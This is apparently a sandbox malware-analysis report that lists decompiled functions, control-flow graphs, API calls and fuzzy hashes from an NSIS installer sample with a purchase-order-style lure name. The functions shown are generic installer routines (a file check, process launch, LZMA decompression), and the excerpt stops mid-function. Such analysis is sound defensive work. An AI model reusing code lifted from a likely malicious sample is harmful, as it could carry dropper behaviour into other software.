                                                                                                                          Function 004058CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 601 4058cf-4058ea call 405cfb call 405882 606 4058f0-4058fd call 405f5d 601->606 607 4058ec-4058ee 601->607 611 405909-40590b 606->611 612 4058ff-405903 606->612 608 405942-405944 607->608 614 405921-40592a lstrlenA 611->614 612->607 613 405905-405907 612->613 613->607 613->611 615 40592c-405940 call 4057ee GetFileAttributesA 614->615 616 40590d-405914 call 405ff6 614->616 615->608 621 405916-405919 616->621 622 40591b-40591c call 405835 616->622 621->607 621->622 622->614
                                                                                                                          C-Code - Quality: 53%
                                                                                                                          			E004058CF(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E00405CFB(0x421988, _a4);
				_t21 = E00405882(0x421988);
				if(_t21 != 0) {
					E00405F5D(_t21);
					if(( *0x423f98 & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x421988;
						while(1) {
							_t11 = lstrlenA(0x421988);
							_push(0x421988);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E00405FF6();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405835(0x421988);
								continue;
							} else {
								goto L1;
							}
						}
						E004057EE();
						_t16 = GetFileAttributesA(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}









                                                                                                                          0x004058db
                                                                                                                          0x004058e6
                                                                                                                          0x004058ea
                                                                                                                          0x004058f1
                                                                                                                          0x004058fd
                                                                                                                          0x00405909
                                                                                                                          0x00405909
                                                                                                                          0x00405921
                                                                                                                          0x00405922
                                                                                                                          0x00405929
                                                                                                                          0x0040592a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040590d
                                                                                                                          0x00405914
                                                                                                                          0x0040591c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405914
                                                                                                                          0x0040592c
                                                                                                                          0x00405932
                                                                                                                          0x00000000
                                                                                                                          0x00405940
                                                                                                                          0x004058ff
                                                                                                                          0x00405903
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405903
                                                                                                                          0x004058ec
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00405CFB: lstrcpynA.KERNEL32(?,?,00000400,004032FF,00423780,NSIS Error), ref: 00405D08
                                                                                                                            • Part of subcall function 00405882: CharNextA.USER32(4V@,?,C:\,00000000,004058E6,C:\,C:\,?,?,766DF560,00405634,?,C:\Users\user\AppData\Local\Temp\,766DF560), ref: 00405890
                                                                                                                            • Part of subcall function 00405882: CharNextA.USER32(00000000), ref: 00405895
                                                                                                                            • Part of subcall function 00405882: CharNextA.USER32(00000000), ref: 004058A4
                                                                                                                          • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,?,?,766DF560,00405634,?,C:\Users\user\AppData\Local\Temp\,766DF560), ref: 00405922
                                                                                                                          • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,766DF560,00405634,?,C:\Users\user\AppData\Local\Temp\,766DF560), ref: 00405932
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                          • String ID: C:\
                                                                                                                          • API String ID: 3248276644-3404278061
                                                                                                                          • Opcode ID: e2955dcf029725b2ed1d5fce7c573bfe7ab26ede656e04fe1650c1d49aac5c3f
                                                                                                                          • Instruction ID: 03f6043ec37f77008ca106ed659fbfe74b4750b5f08ac9da600103de26cb934a
                                                                                                                          • Opcode Fuzzy Hash: e2955dcf029725b2ed1d5fce7c573bfe7ab26ede656e04fe1650c1d49aac5c3f
                                                                                                                          • Instruction Fuzzy Hash: 94F02822509E116AC222333A1C09A9F0A19CE86338714453BFC51B22D2DB3C8D53ED7E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040555B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 624 40555b-405588 CreateProcessA 625 405596-405597 624->625 626 40558a-405593 CloseHandle 624->626 626->625
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0040555B(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x422588->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x422588,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                                                                          0x00405564
                                                                                                                          0x00405580
                                                                                                                          0x00405588
                                                                                                                          0x0040558d
                                                                                                                          0x00000000
                                                                                                                          0x00405593
                                                                                                                          0x00405597

                                                                                                                          APIs
                                                                                                                          • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422588,Error launching installer), ref: 00405580
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040558D
                                                                                                                          Strings
                                                                                                                          • Error launching installer, xrefs: 0040556E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                          • String ID: Error launching installer
                                                                                                                          • API String ID: 3712363035-66219284
                                                                                                                          • Opcode ID: 6ee0d5fb62aa5cd444cc046de2ae5613a3aa22ad20399a78c34ba76405e5be99
                                                                                                                          • Instruction ID: b38bf566800866b301abd826c958dc9a0f2413a88be004d39ffa53c3aefd5702
                                                                                                                          • Opcode Fuzzy Hash: 6ee0d5fb62aa5cd444cc046de2ae5613a3aa22ad20399a78c34ba76405e5be99
                                                                                                                          • Instruction Fuzzy Hash: 29E0ECB4A0020ABBDB109F64ED09A6B7BBDFB14345F808921A914E2150E7B8D9549A69
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00406768 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 631 406768-40676e 632 406770-406772 631->632 633 406773-406a71 631->633 632->633 635 406a9b-406a9f 633->635 636 406aa1-406ac2 635->636 637 406aff-406b12 635->637 638 406ac4-406ad9 636->638 639 406adb-406aee 636->639 640 406a1b-406a21 637->640 642 406af1-406af8 638->642 639->642 645 4061c6 640->645 646 406bce 640->646 643 406a98 642->643 644 406afa 642->644 643->635 655 406a7d-406a95 644->655 656 406baf 644->656 647 406272-406276 645->647 648 4062e2-4062e6 645->648 649 4061cd-4061d1 645->649 650 40630d-4069b4 645->650 651 406bd1-406bd5 646->651 660 406b22-406b2c 647->660 661 40627c-406295 647->661 657 406b31-406b3b 648->657 658 4062ec-406300 648->658 653 4061d7-4061e4 649->653 654 406bb9-406bcc 649->654 664 4069b6-4069cc 650->664 665 4069ce-4069e4 650->665 653->646 662 4061ea-406230 653->662 654->651 655->643 656->654 657->654 663 406303-40630b 658->663 660->654 666 406298-40629c 661->666 667 406232-406236 662->667 668 406258-40625a 662->668 663->648 663->650 669 4069e7-4069ee 664->669 665->669 666->647 670 40629e-4062a4 666->670 671 406241-40624f GlobalAlloc 667->671 672 406238-40623b GlobalFree 667->672 673 406268-406270 668->673 674 40625c-406266 668->674 675 4069f0-4069f4 669->675 676 406a15 669->676 677 4062a6-4062ad 670->677 678 4062ce-4062e0 670->678 671->646 679 406255 671->679 672->671 673->666 674->673 674->674 680 406ba3-406bad 675->680 681 4069fa-406a12 675->681 676->640 682 4062b8-4062c8 GlobalAlloc 677->682 683 4062af-4062b2 GlobalFree 677->683 678->663 679->668 680->654 681->676 682->646 682->678 683->682
                                                                                                                          C-Code - Quality: 99%
                                                                                                                          			E00406768() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00406BD6))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
